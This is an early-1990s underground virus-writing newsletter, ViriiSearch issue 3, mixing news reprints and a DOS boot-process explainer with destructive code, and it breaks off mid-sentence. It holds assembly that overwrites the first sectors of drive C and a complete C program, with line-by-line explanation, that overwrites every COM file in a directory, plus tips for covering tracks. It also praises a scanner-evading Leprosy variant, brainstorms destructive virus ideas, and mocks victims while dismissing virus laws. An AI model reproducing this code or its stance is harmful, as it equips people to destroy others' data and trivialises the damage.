DISCLAIMER: The author will NOT accept responsibility for any damage to your computer media and/or files, or responsibility for any action you might take that will result in legal proceedings, the source code, if any, in this newsletter is THE REAL THING, and you, after you read this, will be well aware of what virii are capable of, and knowing that, it is expected that you will act responsibly. DISCLAIMER II: All I know about programming I have learned on my own, and did not go to school for, and am still learning. As a result, I am sometimes prone to make mistakes, and be wrong about things, so please be patient if I should make a mistake, or say something that isn't true, which would be totally unintentional. ViriiSearch ----------- The Virus Research Newsletter Volume 1, Number 3 Date: 08/02/92 CREDITS: ----------------------------------------------------------------------------- Author...................................................Criminal Minded Editor...................................................Criminal Minded Ideas, Source, Examples Supplied By......................Criminal Minded Facts Stolen From Several Sources By.....................Criminal Minded ----------------------------------------------------------------------------- Introduction: Welcome To The Third Issue Of Viriisearch, The Virus Research Newsletter. In this issue you will find some changes, the layout has been changed slightly, there are some new sections, and it's more organized. Let me know how you like the changes, thanks! In this issue: ----------------------------------------------------------------------------- DEPARTMENTS: | FEATURES: ----------------------------------------------------------------------------- In The News | Soviet Virii Attacks | NASA's "No Nukes Worm" | The Senate's Virus Bill ----------------------------------------------------------------------------- Programming Shop | Absolute Disk Reads/Writes ----------------------------------------------------------------------------- Programming Shop - Dissection Dept. | Explanation Of Above Example ----------------------------------------------------------------------------- The Machine Shop | The Bootstrap Routine ----------------------------------------------------------------------------- Sample Source Code Of Virii | A Replication Experiment ----------------------------------------------------------------------------- "Suicidal Tendencies" Dept. | Leprosy (Strain C) ----------------------------------------------------------------------------- Virus Info | The Devil's Dance Virus ----------------------------------------------------------------------------- Articles | Unique Virii Names/Ideas |------------------------------------ | Assembly vs C Language Virii |------------------------------------ | My Profile Of A Virus Writer And | My Views On The Virii Law |------------------------------------ | Are Virii REALLY A Problem? And For | Who? |------------------------------------ | The Brain Virus: Fact And Fantasy ----------------------------------------------------------------------------- Final Notes | Special Thanks, Greetings, Etc. ----------------------------------------------------------------------------- In The News: ------------ ----------------------------------------------------------------------------- Welcome to a new section of Viriisearch! In this section we will cover virii that made the news, old and new. Hope you enjoy the new section! ----------------------------------------------------------------------------- The U.S.S.R. is already suffering from an outburst of computer viruses and crimes. Computer users should look to U.S. experiences to learn about information security before the problem escalates even further. Pirated software is prevalent in the Soviet Union, purchased from Hong Kong and Swiss connections. The existence of numerous viruses has been confirmed by Soviet and Eastern Europe anti-viral programmers and include Yankee Doodle, Disk Killer 170X, Jerusalem, Friday The 13th COM and Victor, to name a few. Three available antivirus programs are Lozynkv's Aidstest and Kotik's Anti-Kot and Anti-Kor. Western and home-grown antivirus programs are also being used. A lack of trained data security experts and data security support services only make the problem worse. The situation is likely to worsen before serious measures are taken to combat both viruses and crime. Decisions about protecting information are not being developed either. "Bozhe Mov! Hackers and viruses already plague Soviets." Originally written by Sanford Sherizen. Computerworld August 20th 1990, Page 74. ----------------------------------------------------------------------------- This next "In The News" Article is about a worm, not a virus, but I found it interesting and decided to re-print it. ----------------------------------------------------------------------------- DEC users are warned by the U.S. Department of Defense's Computer Emergency Response Team (C.E.R.T) that a worm discovered on a NASA computer network in the third week of Oct. 1989 may find it's way onto other DECnet networks. The worm changed system banners to display an antinuclear message, and thus was called the 'No Nukes Worm' by one NASA official. The program entered NASA's Space Physics Analysis Network (S.P.A.N) through the DECnet Internet series of networks that links approximately 13,000 computers, government agencies, research centers, universities, and other facilities. DEC spokesman Jef Gibson said that VAX/VMS system managers should have closed the loophole through which the worm gained access after it was discovered in Dec. 1988. NASA believes the worm may have been intended to protest the launch of the Atlantis space shuttle that carried a plutonium powered probe on it's way to Jupiter. "Worms eats holes in NASA's DECnet; 'No Nukes Worm' replaces system banners with antinuclear message" Originally written by Michael Alexander and Maryfran Johnson. Computerworld October 23rd 1989. Page 4. ----------------------------------------------------------------------------- A Senate bill updating the Computer Fraud and Abuse Act of 1986 is being praised by computer and legal experts, but it's passage could encourage lawsuits against innocent institutions. The bill redefines the notion of computer 'access' to cover the intentional transmission or distribution of unauthorized applications that somehow cause damage to either hardware, software, or data. Intentional abusers face felony charges with penalties up to five years in prison and a $250,000 fine. The reckless, albeit, unintentional transmission of virus-ridden software could result in a misdemeanor charge and up to one year in jail and a $5,000 fine. The reach of the previous law would also be extended to include computers used in interstate communications or commerce. A U.S. Department of Justice official says the bill grants prosecutors greater flexibility. "Virus bill raises hopes, fears: updated laws could hold unwitting transmi- tters liable for damages. (Computer Fraud and Abuse Act of 1986)" Originally written by Gary H. Anthes. Computerworld August 13th, 1990. Page 45. ----------------------------------------------------------------------------- Programming Shop: ----------------- ***************************************************************************** First we will cover absolute disk reads/writes using Assembly language. ***************************************************************************** This next example will write the contents of 'buffer' to the first ten sectors of drive C: ***************************************************************************** WARNING: There is NO recovery from this. ***************************************************************************** abswrite proc near buffer db 'Lick Me' dup (?) mov al,2 mov cx,10 mov dx,1 mov bx,seg buffer mov ds,bx mov bx,offset buffer int 26h jc error add sp,2 abswrite endp ***************************************************************************** Next is absolute disk read(s) ***************************************************************************** absread proc near buffer db 512 dup (?) mov al,2 mov cx,10 mov dx,1 mov bx,seg buffer mov ds,bx mov bx,offset buffer int 25h jc error add sp,2 absread endp ***************************************************************************** Programming Shop - Dissection Dept. ***************************************************************************** absread proc near buffer db 512 dup (?) mov al,2 mov cx,10 mov dx,1 mov bx,seg buffer mov ds,bx mov bx,offset buffer int 25h jc error add sp,2 absread endp ***************************************************************************** First we will discuss absolute disk read(s). The line "mov al,2" is telling which drive we want to read from. Drive #2 is drive C. The next line, "mov cx,10" is telling how many sectors we want to read (10) The line, "mov dx,1" is telling the starting sector number to start reading at. (1) The next three lines: mov bx,seg buffer mov ds,bx mov bx,offset buffer establish the address of the buffer, and then DS:BX point to the segment:offset of the buffer. The next line, "int 25h" is the function number of the "absolute read" function. The next line, "jc error" jumps if there is an error. and the last line, "add sp,2" clears the stack. Notes: The purpose of clearing the stack using "add sp,2" is because, when function int 26h returns, the CPU flags originally pushed onto the stack by int 26h are still on it. You should clear it to prevent uncontrolled stack growth and to make available any other values pushed onto the stack before the call to int 26h. ***************************************************************************** Next we will discuss absolute disk write(s) and the difference between the two functions, read and write. ***************************************************************************** As you can see, there is little difference between the two: Absolute Read: Absolute Write: _____________________________________________________________________________ absread proc near | abswrite proc near buffer db 512 dup (?) | buffer db 'Lick Me' dup (?) mov al,2 | mov al,2 mov cx,10 | mov cx,10 mov dx,1 | mov dx,1 mov bx,seg buffer | mov bx,seg buffer mov ds,bx | mov ds,bx mov bx,offset buffer | mov bx,offset buffer int 25h | int 26h jc error | jc error add sp,2 | add sp,2 absread endp | abswrite endp ----------------------------------------------------------------------------- Absolute disk read and absolute disk write are identical except for four lines: Note: Periods replace the lines in each example that are identical. ----------------------------------------------------------------------------- absread proc near | abswrite proc near buffer db 512 dup (?) | buffer db 'Lick Me' dup (?) . | . . | . . | . . | . . | . . | . int 25h | int 26h | . | . . | . absread endp | abswrite endp ----------------------------------------------------------------------------- The differences in the above examples are as follows: The first line: This is the beginning of each procedure. They are named for what they do, absread for absolute read and abswrite for absolute write. You could've named the two procedures something else, for instance: shithead and dickhead, and it wouldn't matter. The second line: In the case of absolute read, we have our buffer declared as 512 bytes and not initialized. In the case of absolute write, we have the buffer initialized to store the string 'Lick Me'. The ninth line: This line is the function number, int 25h being the function number for absolute disk read, and int 26h being the function number for absolute disk write. The twelfth line: This is just the end of each of the two procedures. ***************************************************************************** The Machine Shop: ----------------- ----------------------------------------------------------------------------- Welcome to a brand new section of Viriisearch! Here we will discuss hardware oriented subjects, such as RAM, Machine Cycles, Boot Routines, etc. ----------------------------------------------------------------------------- This month we will discuss the 'Bootstrap' routine. ----------------------------------------------------------------------------- Many people turn on their machines, let DOS load and don't think a second thought about it. Those people also take MS-DOS for granted and don't even care what it it doing, even though it is the most important piece of software a IBM user can have. One of my favorite sayings: 'A Computer Without MS-DOS Is Little More Than A Boat Anchor' Here I will tell exactly what MS-DOS does from the second you hit the power switch up until the time you get the prompt --> C> When the system is started or reset, program execution begins at address 0FFFF0H. This is a feature of the 8086/8088 family of microprocessors and has nothing to do with MS-DOS. Systems based on these processors are design- ed so that address 0FFFF0H lies with an area of ROM and contains a jump mach- ine instruction to transfer control to system test code and the ROM bootstrap routine. The ROM bootstrap routines reads the disk bootstrap routine from the first sector of the system startup disk (the boot sector) into memory at some arbitrary address and then transfers control to it. (The boot sector also contains a table of information about the disk format.) The disk bootstrap routine checks to see if the disk contains a copy of MS-DOS. It does this by reading the first sector of the root directory and determining whether the first two files are IO.SYS and MSDOS.SYS (or IBMIO.COM and IBMDOS.COM), in that order. If these files are not present, the user is prompted to change disks and strike any key to try again. If the two system files are found, the disk bootstrap routine reads them into memory and transfers control to the initial entry point of IO.SYS. (In some implementations, the disk bootstrap routine reads only IO.SYS into memory, and IO.SYS in turn loads the MSDOS.SYS file.) The IO.SYS file that is loaded from the disk actually consists of two separ- ate modules. The first is the BIOS, which contains the linked set of resident device drivers for the console, auxiliary port, printer, block, and clock de- vices, plus some hardware specific initialization code that is run only at system startup. The second module, SYSINIT, is supplied by Microsoft and lin- ked into the IO.SYS file, along with the BIOS, by the computer manufacturer. SYSINIT is called by the manufacturer's BIOS initialization code. It determ- ines the amount of contiguous memory present in the system and then relocates itself to high memory. Then it moves the DOS kernel, MSDOS.SYS, from it's or- iginal load location to it's final memory location, overlaying the original SYSINIT code and any other expendable initialization code that was contained in the IO.SYS file. Next, SYSINIT calls the initialization code in MSDOS.SYS. The DOS kernel in- itializes its internal tables and work areas, sets up the interrupt vectors 20H through 2FH, and traces through the linked list of resident device driv- ers, calling the initialization function for each. These driver functions determine the equipment status, perform any necessary hardware initialization, and set up the vectors for any external hardware interrupts the drivers will service. As part of the initialization sequence, the DOS kernel examines the disk par- ameter blocks returned by the resident block-device drivers, determines the largest sector size that will be used in the system, builds some drive par- ameter blocks, and allocates a disk sector buffer. Control then returns to SYSINIT. When the DOS kernel has been initialized and all the resident device drivers are available, SYSINIT can call on the normal MS-DOS file services to open the CONFIG.SYS file. This optional file can contain a variety of commands that enable the user to customize the MS-DOS environment. For instance, the user can specify additional hardware device drivers, the number of disk buf- fers, the maximum number of files that can be open at one time, and the file name of the command processor (shell). if it is found, the entire CONFIG.SYS file is loaded into memory for process- ing. All lowercase characters are converted to uppercase, and the file is in- terpreted one line at a time to process the commands. Memory is allocated for the disk buffer cache and the internal file control blocks used by the handle file and record system functions. Any device drivers indicated in the CONFIG file are sequentially loaded into memory, initialized by calls to their init modules, and linked into the device driver list. The init function of each driver tells SYSINIT how much memory to reserve for that driver. After all installable device drivers have been loaded, SYSINIT closes all file handles and reopens the console (CON), printer (PRN), and auxiliary (AUX) devices as the standard input, standard output, standard error, standard list, and sta- ndard auxiliary devices. This allows a user-installed character device driver to override the BIOS's resident drivers for the standard devices. Finally, SYSINIT calls the MS-DOS EXEC function to load the command interpr- eter, or shell. (The default shell is COMMAND.COM, but another shell can be substituted by means of the CONFIG.SYS file.) Once the shell is loaded, it looks for AUTOEXEC.BAT, automatically running any internal DOS commands and external commands inside that file. If it doesn't find AUTOEXEC.BAT it will ask for the date and time (providing a clock chip isn't present) and then displays the prompt, waiting for the user to enter a command. MS-DOS is now ready for business, and SYSINIT is discarded. ----------------------------------------------------------------------------- Sample Source Code Of Virii: ---------------------------- ----------------------------------------------------------------------------- This month we will discuss something I have been fooling around with and have finally completed. It is not a virus, but can be modified and made into one. What the following code basically does is find all the COM files in the curr- ent directory, and overwrites them with itself. It's basically a replicating program. ----------------------------------------------------------------------------- #include #include #include #include #include #include #include #include FILE *file1,*file2; int main(void); main() { long size; char *code = NULL; struct find_t com_file; _dos_findfirst("*.COM", _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &com_file); chmod(com_file.name, S_IREAD|S_IWRITE); file1=fopen("HELLO.EXE","rb"); file2=fopen(com_file.name,"wb"); size=filelength(fileno(file1)); code=malloc(size); fread(code, size, 1, file1); fwrite(code, size, 1, file2); while (_dos_findnext(&com_file) == 0) { chmod(com_file.name, S_IREAD|S_IWRITE); file2=fopen(com_file.name,"wb"); fwrite(code, size, 1, file2); } fcloseall(); free(code); } ----------------------------------------------------------------------------- Ok, this line: _dos_findfirst("*.COM", _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &com_file); finds the first occurence of a COM file with any of the attributes listed. They are "ORed" together using the | character. It passes the filename to the "com_file" structure, and references to that file are now: com_file.name Upon one being found, it goes onto: chmod(com_file.name, S_IREAD|S_IWRITE); which changes the attributes of the file found to that it can be written to. The next line opens the file you want to replicate in "read binary" mode, that it what the "rb" switch is for. file1=fopen("VIRUS.EXE","rb"); Then it opens the first COM file, the 'victim' to be overwritten, in "write binary" mode (that's what the "wb" is for) file2=fopen(com_file.name,"wb"); Then it obtains the size of the virus and allocates enough memory for it. size=filelength(fileno(file1)); code=malloc(size); Then it reads the virus code into the buffer "code" which is size "size", is 1 item, and is reading it from "file1" fread(code, size, 1, file1); Then it takes "code" which is size "size", is 1 item, and writes it to "file2" fwrite(code, size, 1, file2); Once it is done with that, it goes onto the loop: while (_dos_findnext(&com_file) == 0) { chmod(com_file.name, S_IREAD|S_IWRITE); file2=fopen(com_file.name,"wb"); fwrite(code, size, 1, file2); } Both _dos_findfirst() and _dos_findnext return 0 if they are successful at finding the specified file, so basicall this loop is saying: "keep going as long as _dos_findnext(&com_file)) equals 0" What it does every time it passes through the loop (i.e. - finds a COM file): changes the mode of the file so it can be written to, opens that file in "write binary" mode, and writes the virus code to it. When there are no more COM files found, the loop is done and it goes onto the next part of the program: fcloseall(); free(code); } it closes all open files associated with this program, releases the previous- ly allocated memory for the virus code, and exits. ----------------------------------------------------------------------------- NOTES: This is kind of slow but is somewhat faster than the example in issue #2 that truncated files to 0 bytes. You can also fool around with getting and setting the file's date and time, and changing it's size back to what it was originally to cover your tracks. ----------------------------------------------------------------------------- Suicidal Tendencies Dept/Virus Of The Month: ----------------------------------------------------------------------------- The virus of the award month goes to: Leprosy (C Strain) ----------------------------------------------------------------------------- NOTE: This is actually Leprosy - B Strain , but modified by TBSI so McAffee's scanner wouldn't find it. Originally written by PCM2 in August of 1990. Modified by TBSI in June of 1991. PCM2, The person who wrote this, and all other strains of Leprosy, did a real nice job with this one. I placed the file, LEPROSYC.COM, on a 5.25 360K floppy in drive B and this is what was on the disk: Volume in drive B has no label Directory of B:\ COMMAND COM 47845 04-09-91 5:00a ANSI SYS 9029 04-09-91 5:00a RAMDRIVE SYS 5873 04-09-91 5:00a CONFIG SYS 39 01-01-80 12:35a SYS COM 13440 04-09-91 5:00a NDOS COM 2419 08-14-84 12:00p MEM EXE 39818 04-09-91 5:00a DEBUG EXE 21692 06-07-90 2:24a AUTOEXEC BAT 69 01-01-80 3:37a PKUNZIP EXE 23528 03-15-90 1:10a LEPROSYC COM 666 06-05-91 12:36a 11 file(s) 164418 bytes 192512 bytes free This is BEFORE I ran the virus...this is after: Volume in drive B has no label Directory of B:\ COMMAND COM 47845 04-09-91 5:00a ANSI SYS 9029 04-09-91 5:00a RAMDRIVE SYS 5873 04-09-91 5:00a CONFIG SYS 39 01-01-80 12:35a SYS COM 13440 04-09-91 5:00a NDOS COM 2419 08-14-84 12:00p MEM EXE 39818 04-09-91 5:00a DEBUG EXE 21692 06-07-90 2:24a AUTOEXEC BAT 69 01-01-80 3:37a PKUNZIP EXE 23528 03-15-90 1:10a LEPROSYC COM 666 06-05-91 12:36a 11 file(s) 164418 bytes 192512 bytes free There is not one single difference with any of the files, yet EVERY .EXE and .COM file on the disk was infected. No changes in size, no date/time changes. Well, the dates and times did change but the virus preserves the original date and time stamps, restoring them once the infection is complete. But no changes in file sizes.....this virus was very well written. It was fast, efficient, and very small in size. The source code to this particular virus is 16664 bytes, and, as you can see, the .COM file is only 666 bytes. This is what the virus did when run: It accessed drive B for a few seconds, and gave me the error message: Program too big to fit into memory. I did not notice any changes at all so I assumed it didn't infect any of the files, but when I ran each .EXE and .COM file on the disk, they all gave me that error message... 'Program too big to fit into memory' so I assume they all were infected. The program is actually supposed to give me this message when it is done: ATTENTION! Your computer has been afflicted with the incurable decay that is the fate wrought by Leprosy Strain B, a virus employing Cybernetic Mutation Technology(tm) and invented by PCM2 08/90. For some reason it did not display this message. Perhaps there is a certain amount of files it must infect before it displays it. I did not take too good of a look at the source to determine this. All in all a very nicely written virus, does it's job fast and very efficiently. ----------------------------------------------------------------------------- Virus Info: ----------- ----------------------------------------------------------------------------- Welcome to a brand new section of Viriisearch! In this section we will give valuable information on a virus, such as origin, aliases, etc. Some of the info presented here is taken from the file: MSDOS.ZIP, a index of DOS virii. Other info presented was supplied by me, such as the scan string, name of virus author, etc. ----------------------------------------------------------------------------- Virus Spotlight This Month Will Cover: The Devil's Dance Virus ***************************************************************************** Name Of Virus: The Devil's Dance Virus Virus Aliases: Devil/941 Virus Name Of Virus Author: N/A Language Virus Was Written In: N/A Date Virus Was First Discovered Or Originated: Spring of 1990 Place Virus Was First Discovered Or Originated: Mexico City Scan String: 0L0G0M0H0G1U0G0R0HBK2MDY3Y0G0G4MCU0G2LDG1Y4LCU0G2L0G2MBR4SDNFLDN8H3XFW4XBW5U0 G2L1WDNFGFM0H0JBR0G0Q6MAV0G0M6GFK0G0MBV7W0G0M6GFK0G0M7Z0G0M9SEJBZ1L0G0M5S0G2L 1L0G0M1L0G0MEW0G0MBR0M0MAW4Q0K0G0G Checksum: CF3C Hooked Interrupts: INT 21H, functions 4B00H and 49H, INT 09H Trigger: Upon INT 21H, function 4B00H, being called, the .COM file will be infected. Also, if you hit the CTRL-ALT-DEL sequence anytime after typing a total of 2,500 characters, the first sector of drive C will be overwritten. Identification: If you do a hexadecimal dump of the virus, the following: "Drk" & "*.com" should be seen in the code. Also, the time and date of the infected file is set to the time and date of infection. If you rest the system by pressing CTRL-ALT-DEL, the virus will display the following message: "Have you ever danced with" "the devil under the weak light of the moon?" "Pray for your disk! The_Joker..." "Ha Ha Ha Ha Ha Ha Ha Ha Ha Ha". If your monitor/card supports color, all characters typed will be in a different color. Size & Name Of Original Virus EXE/COM File: N/A Techniques Used: All file attributes are removed and the following message is encrypted: "Have you ever danced with" "the devil under the weak light of the moon?" "Pray for your disk! The_Joker..." "Ha Ha Ha Ha Ha Ha Ha Ha Ha Ha". What It Attacks: .COM Files: Yes .EXE Files: No COMMAND.COM: Yes (If in the current directory when virus is first run, or if COMMAND.COM is run) Boot Sector: No File Allocation Table (FAT): No Fixed Disk Partition Table: No Note: The Boot Sector, FAT, or Fixed Disk Partition Table MAY be attacked if any of them reside on the first sector of drive C because the virus does attack that part of the drive. (See Damage Report) It depends on your drive and what resides in the first sector. Change In Size/Date/Time Of Infected File: 941 bytes, Date & Time Is Changed According To The System's Date And Time At The Time Of Infection. Virus Volume Label: None Known Number Of Strain(s): None Damage : When the virus is first run, it will infect ALL the .COM files in the current directory. After pressing 2,500 keys, if you should reset the system by pressing CTRL-ALT-DEL, the virus will overwrite the first sector of drive C. Also, any .COM file you run will be infected. If the .COM file infected is bigger than 64,337 bytes, it will not run correctly after being infected. ***************************************************************************** --------- Articles: --------- **************************** * Unique Virii Names/Ideas * **************************** I was looking at some virii names recently, and I noticed that a few of them are pretty stupid...like 'Fuck you' or 'Fuck Me' or 'Phuck'....it does not take too much intelligence to think up these names so that's why I decided to include this article in this month's Viriisearch and here are some virii names and ideas that I thought of: ----------------------------------------------------------------------------- Stolichnaya - Maybe we could have this one display a picture of Kitty Dukakis as it deletes your files or trashes your hard drive. Valhalla - For those of you who don't know, Valhalla is the Viking Heaven. To be honest, I didn't really put much thought into what this would do as a virus.....I just like the name and though it might be a cool name for a virus. Red Sector A - This is a song by Canadian Power Trio, Rush. Perhaps this can overwrite the boot sector with the lyrics to the song. Maybe have it pick randomly from a list of tour dates from the 'Roll the bones' tour as it's trigger date. 4th Of July - We have virii for Christmas, Columbus Day, etc....but I have not seen one called 4th Of July....so here we are... Blizzard - We could have this annoy the user with random 'snow' on the monitor which gradually gets worse and worse until you can no longer see the screen. While it is doing that and flashing fake error messages, it can eat some files or encrypt the file allocation table or something. We can also have it's trigger date as the date that the Blizzard of '78 hit... ***************************************************************************** ******************************** * Assembly vs C Language Virii * ******************************** Most C language functions are written in Assembly, so some consider C a modified Assembly language....and some also claim that a well written C program is almost as fast as Assembly. This may be true, but when it comes to writing a virus, I say Assembly is the winner hands down. Earlier we had discussed the "Leprosy-B" virus. The Assembly source code to that virus is 16664 bytes and the .COM is a remarkable 666 bytes. If I tried to write that virus in C language, the smallest I could get the .COM or .EXE file would be about 8 kilobytes if I was lucky. In a previous issue, we discussed my ATTRB program which is about 3K in source, and a 9K executable, and that is really good for C language...here we have a .COM file smaller than the source code. Well over 20% smaller. ***************************************************************************** ********************************* * My Profile Of A Virus Writer * * And My Views On The Virus Law * ********************************* A lot of people may wonder why someone would want to write a virus. Some people believe it's a former employee wanting revenge against his company. Others believe that it's a personal vendetta against a fellow computer user or the sysop of a BBS, or a student wishing to piss his teacher off. Some or all of these may be true, but I personally believe that one person cannot possibly mad at all of the computer society. So, why would someone want to write a virus? Well, Phalcon/Skism (Canada) claim they do it to 'make the lives of the anti-viral people a living hell' so there's one reason. I also believe they do it because THEY CAN. That's it. They do it because they know how. I don't see the average virus writer as a basket case genius egomaniac as a lot of people do, I see them as a ordinary every day person with very good programming abilities and nothing more. I do not sympathize with any person that gets hit by a virus, either. I sit there and laugh alongside the person who wrote the virus. Sound cruel? Well, I have my reasons. People know they exist, and all the information they need to protect themselves and prevent virus attacks is all right there for the taking. Not just in the underground so there is no excuse why these people cannot obtain these materials....If you take the proper precautions and steps, a virus attack will never happen on your machine and if a real intelligent one comes along that is able to sneak by a virus scanner and/or disable a virus scanner's method(s) of scanning, and your hard drive is wiped clean, that's what back ups are for. If you are one of those people who don't want to take the time to backup, or think backing up is 'for wimps' (as someone had said once - I am not sure if they were serious or not) when you lose everything just bend over and kiss your sorry ass goodbye. Anyway, back to the topic of this art- icle: Why would someone want to write a virus? I already covered some of the reason why one would want to do this, and covered my reason why they do it. The average virus writer writes his virus in the hopes some sap doesn't listen to all the warnings and runs software downloaded from a BBS without scanning it for a known virus first and gets hit by it. Then he sits there and laughs his ass off. And I don't blame him. And as for all this law bullshit about computer virii (The Computer Fraud And Abuse Act Of 1986) I have to laugh about that, too....I don't really see computer virii as a major threat to much of anything. It all depends on how you look at it I suppose. I see it this way: A favorite book of yours gets stolen or destroyed. You have another copy of it. Do you care about the stolen/destroyed one? Yes, slightly, but not as much if the stolen/destroyed one had been your only copy. Same with software. That's why I think the law(s) concerning virii is ridiculous. Now only if they put that much effort into more serious crimes, like murder, rape and drugs. In the article earlier, they mentioned a sentence of five years in jail and a $250,000 fine...for what? Contaminating some bureacrats PC and destroying his list of drugs growing in his backyard? And look at Robert T. Morris Jr. He found a loophole in ARPANET, wrote and released a worm that hogged all the memory and forced thousands of machines to be shut down for up to ten days or so. So what? Did he deserve what they gave him? He was thrown out of school, forced to pay $10,000 in fines, perform 400 hours of community services, and was on 3 years probation. I do not agree with this at all whatsoever. The reason why he got such a stiff sentence for such a minor crime, if you can call it a crime at all, is because the government had a interest in the network Morris interrupted. Morris didn't even have malicious intent. They should be glad that HE, and not someone else who might have had malicious destruction in mind, showed them the security loopholes in the system. Instead they fine him, make him do community services (which was probably cleaning some rich bureacrats pool or trimming his lawn) and place him on 3 years probation hoping he fucked up again so they could make more money and wouldn't have to worry about their lawns or pools for another few weeks. ***************************************************************************** ******************************* * Are Virii Really A Problem? * * And For Who? * ******************************* This is a question I present to the bureacrats and lawmakers: Are virii a REAL problem? And for who are they a problem? I think they are blowing the whole thing way out of proportion and making people into criminals who are not criminals. Let's say you rip out asbestos for a living, and you get sick from it. Would you call the person that makes the asbestos a criminal? No, of course not. Asbestos is just a hazard of the job. If your job deals with computers, consider computer virii as just a hazard of the job. It's a chance you take. If you don't want to take the risk, either find another career or take the proper precautions to prevent a virus attack. Just like the person who works with asbestos every day, he wears a mask, and gloves so he doesn't get sick. So equip yourself with a real good scanner, be real careful about where and who you get your software from and stop calling the people who write virii 'criminals' and treating them like they are. Or if you are too damn lazy to take the proper precautions, just have a backup at all times. Should you get attacked by a virus, clean up the computer and install everything again. I am, of course, referring to personal PCs...and not main- frames, or networks....this is what I have to say about them: If Internet or NASA's network should get attacked and disabled again, I say the institutions and people who pay to use those networks should sue NASA or the people who run Internet because they are the real criminals for not taking steps to make sure this didn't happen again. It's kind of like this: If you left your front door open with a $800 VCR and a $500 TV clearly in view, do you think it would still be there when you got home? No, of course not, so you lock your door and equip your home with a expensive alarm system. Why these people who scream computer crime every time their system gets attacked don't have more secure systems is beyond me. Instead of crying for anti-virus laws they should spend more time making the security on their network or mainframe even tighter. The answer to the question 'Are virii a REAL problem?' is NO....at least to me. People make into a problem. 'A problem for who?' Lazy virus illiterate people who don't know any better....that don't bother securing their systems. To me that's their own damn fault and THEY should be brought up on charges. Maybe we should have a new law...'The virus ignorance law' Section 51-A Of The 1986 Computer Fraud And Abuse Act Of 1986 Clearly States That You, If Found Guilty Of Virus Ignorance, Could Be Sentenced To Up To 5 Years In Jail, $500,000 In Fines, 800 Hours Of Cleaning Virus Ridden Computers And 2 Years Probation. After all, wouldn't you consider sitting there with your head firmly wedged up your ass as your computer gets invaded by a virus, computer abuse? I do. ***************************************************************************** This one is for Midnight Cowboy. This was taken from a book and re-printed WITHOUT permission from the author. ***************************************************************************** ******************************* * The Brain Virus: Fact And * * Fantasy * ******************************* The Brain virus has the distinction of being the first computer virus to strike in the United States outside of a test laboratory. According to Ms. Ann Webster of the Academic Computer Center of the University of Delaware in Newark, Delaware, it was reported to the Computer Center on October 22, 1987. It was found in other locations on the campus one or two days later. It was named the Brain virus because it wrote that word as the disk label on any floppy disk it attacked. After the initial an- alysis of this computer virus on an infected disk two names, Basit and Amjad, and their address in Lehore, Pakistan, was found. Because of this, the virus has also been called the Pakistani virus. Many misconceptions exist about this virus because of incomplete and/or inaccurate statements that appeared in newspapers. Most of the newspaper and popular magazine writers did not have any computer knowledge and some were eager to seek "horror stories: so that their articles would be different. Even the co- mputer trade and professional publications have included errors in their accounts of this virus. Some of the professional writers, both in the US and abroad, based their articles on previously published information. Most did not have a working copy of the Brain and even the few who did, failed to fully analyze the actual programs code. In our Microcomputer Security Laboratory we have several copies of the Brain virus obtained from diff- erent sources. We have spent many hours running the Brain virus, explor- ing it's different methods of infection, testing it's interaction with different media and isolating the virus so that we could produce an as- sembly language listing. We have also discussed its code and infection methodology with virus researchers. Therefore we hope to clear up some current confusion. Some Characteristics of the Brain ---------------------------------- 1. The brain has been called benign in the press. Yet, Ms. Webster reported that the files on a number of infected disks were destroyed. The virus at times was destructive. It is impossible to be both. This oxymoron can be explained by the fact that the virus may remain on the floppy disk without doing any damage. But at times it has been activated so that it destroys the file allocation table (FAT) that provides information to the operating system as to the location of all files on the disk. It would be stretching the dictionary meaning of benign to say that because the cont- ents of the disk can be reconstructed, no damage has been done. To under- stand the reconstruction problem, suppose we have a set of 30 company re- ports, approximately 20 pages each, all typed within the same margins on the same paper, not page numbered, not clipped, and with no other copy available. Left near an open window, these 600 pages are blown over a wide area with no order preserved. Now, put them back in order. Because the actual data on the floppy disk have not been destroyed, it is poss- ible to use a utility, such as PC Tools, or the Norton Utilities, to read each sector. The appropriate sectors can be moved to another disk in an approximate sequence to replicate the original documents. This is a del- icate and tiresome task. 2. The Brain virus does not notify the user that the disk has been infected immediately before it ruins a disk. The user is never made aware that the disk has been infected. The virus can remain on an infected disk without damaging it, but there is always a risk of unannounced disaster. 3. There is NO ransom demand made by the Brain (See Note 1). 4. The Brain virus code is written so that it will never infect a hard disk. It is media specific; it will attack only double-sided, nine sectored floppy disks that have been formatted under some version of DOS. 5. The virus can infect a microcomputer and spread to floppy disks even if the boot disk is NOT infected. If a non-bootable infected disk is used in an attempt to boot a system, the following message will be displayed on the screen: Please Insert A Bootable Disk The Type [Return] By that time the virus has already hidden itself in RAM memory. Using a clean bootable disk to start the system will result in that disk becom- ing infected. (See Note 2). The virus will then spread to any other fl- oppy used on the system. 6. The virus appears to be unstable. The actual code is some 4100 bytes but less than half of it is actually executed. Two portions of the program are neither called nor can many researchers determine under what circum- stances they would be executed. Was the extra code inserted to confuse any one who disassembled the program? Is there some what that either or both uncalled parts are involved that has thus far been undiscovered? 7. The virus source code contains a counter. The counter is reset often and it is difficult to determine it's purpose. Because the counter was not mentioned in published reports about the Brain, "new" viruses appeared. Some companies whose disks were attacked discovered the counter and de- cided that they had a new virus. When similarities to the Brain were found it was decided that the new viruses were hacker versions of the original found at the University of Delaware. Whether there are hacker versions or destruction was caused by the unstable character of the Brain is a question. Certainly it is not difficult for an experienced program- mer who has obtained a copy of the Brain to modify it's code. Note 1: In the January 31, 1988, issue of The New York Times, the article about computer viruses contained the following: "Buried within the code of the virus discovered at the University of Delaware was an apparent ransom demand: Computer users who discovered the virus were told to send $2,000 to an address in Pakistan to obtain an immunity program, according to Harold Highland....The Pakistani contact was not identified." This statement was never made by me and Vin McLellan and the author of The New York Times article admits that it was never made. Somewhere in the copy preparation and/or editing, the copy was altered. In our discussion, I noted that the names of the authors and their addresses in Lahore, Pakistan, were found in the virus and that there was even a copyright notice. Because of other writers use of the database of newspaper articles about viruses, several picked this qu- ote up and used it without any verification. It has appeared in seve- ral major newspapers in the States as well as in newspapers and the computer trade press abroad. Note 2: This note is my own, and was not in the original article. I noticed that the author of this article had said that other articles releas- ed on the Brain virus had errors in them. I also noticed that his article had an error in it, too. He said: By that time the virus has already hidden itself in RAM memory. Using a clean bootable disk to start the system will result in that disk becom- ing infected. (See Note 2). The virus will then spread to any other fl- oppy used on the system. Now, this is not possible. If you do a "warm boot" the virus may be able to survive and infect that clean bootable disk. BUT if you do a "cold 